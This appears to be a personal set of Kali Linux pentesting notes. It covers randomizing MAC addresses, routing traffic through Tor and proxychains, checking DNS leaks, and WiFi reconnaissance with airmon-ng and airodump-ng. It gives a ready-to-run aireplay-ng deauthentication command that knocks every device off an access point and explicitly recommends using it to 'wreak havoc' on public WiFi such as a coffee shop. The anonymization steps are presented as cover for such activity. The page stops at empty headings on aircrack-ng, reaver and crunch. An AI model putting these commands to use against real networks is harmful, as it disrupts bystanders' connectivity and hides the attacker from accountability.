Anonymizing

macchanger and crontab

We can change our MAC address of our machine using macchanger. If we want the the MAC address to change automatically every time we start Kali Linux, edit contrab:

• crontab -e
• Add the following line at the end of the file: @reboot macchanger -A eth0 (-A will change our machine MAC address to a random vendor MAC address)

tor

Tor anonymizes the overlay network for TCP. To install Tor, type:

apt-get install tor

Don't forget to start Tor prior to run any other pentesting command:

service tor start

To check if tor is running:

service tor status

proxychains

Proxychains is used to anonymize our internet activities. Proxychains configuration file is /etc/proxychains.conf. Editing this file will allow us to choose what type of proxies we will use. The preferred configuration to use with Tor is:

uncomment dynamic_chain

comment strict_chain

add at the end of the file: socks5 127.0.0.1 9050

With the above settings, it is said that we "torify" our actions. For instance, to launch firefox, nmap or any other command (except metasploid), we type:

service tor start

proxychains firefox duckduckgo.com

Check for DNS leaks

service tor start

proxychains firefox dnsleaktest.com

1. Check that your assigned IP is not from your area
2. Click on 'Standard test' button
3. If you see your own country and ISP listed on the results page, you’ll know that your ISP can monitor your connection. That’s not good.

Footprinting

nmap

Network port scanner.

https://security.stackexchange.com/questions/120708/nmap-through-proxy/120723#120723

https://www.shellhacks.com/anonymous-port-scanning-nmap-tor-proxychains/

WiFi

airmon-ng and airodump-ng

First, we have to find our network card wireless device:

ifconfig

In my case is wlp3s0

By default, all network cards are in managed mode. In order to see all wireless access points, we have to change our network card to monitor mode:

ifconfig wlp3s0 down

iwconfig wlp3s0 mode monitor

ifconfig wlp3s0 up

Now we have to kill some processes that may interfere with airodump-ng:

airmon-ng check wlp3s0

airmon-ng check kill

Now we have to scan for all the WiFi access points:

airodump-ng wlp3s0

Now we have to scan a particular access point with the information gathered in the previous step:

airodump-ng -c [CHANNEL] -w [FILE] --bssid [BSSID] wlp3s0

(replace [CHANNEL], [FILE] and [BSSID] with the actual values)

We'll see all devices (STATION MAC addresses) connected to the access point.

aireplay-ng

We can disrupt wifi connection on devices connected to a particular access point. Following the information gathered in previous steps, we can do:

aireplay-ng -0 0 -a [BSSID] wlp3s0

This makes that all devices connected to BSSID access point will lose the wifi connection. You can wreak havoc in a public wifi, like a coffee shop.

aircrack-ng and reaver

aircrack-ng and crunch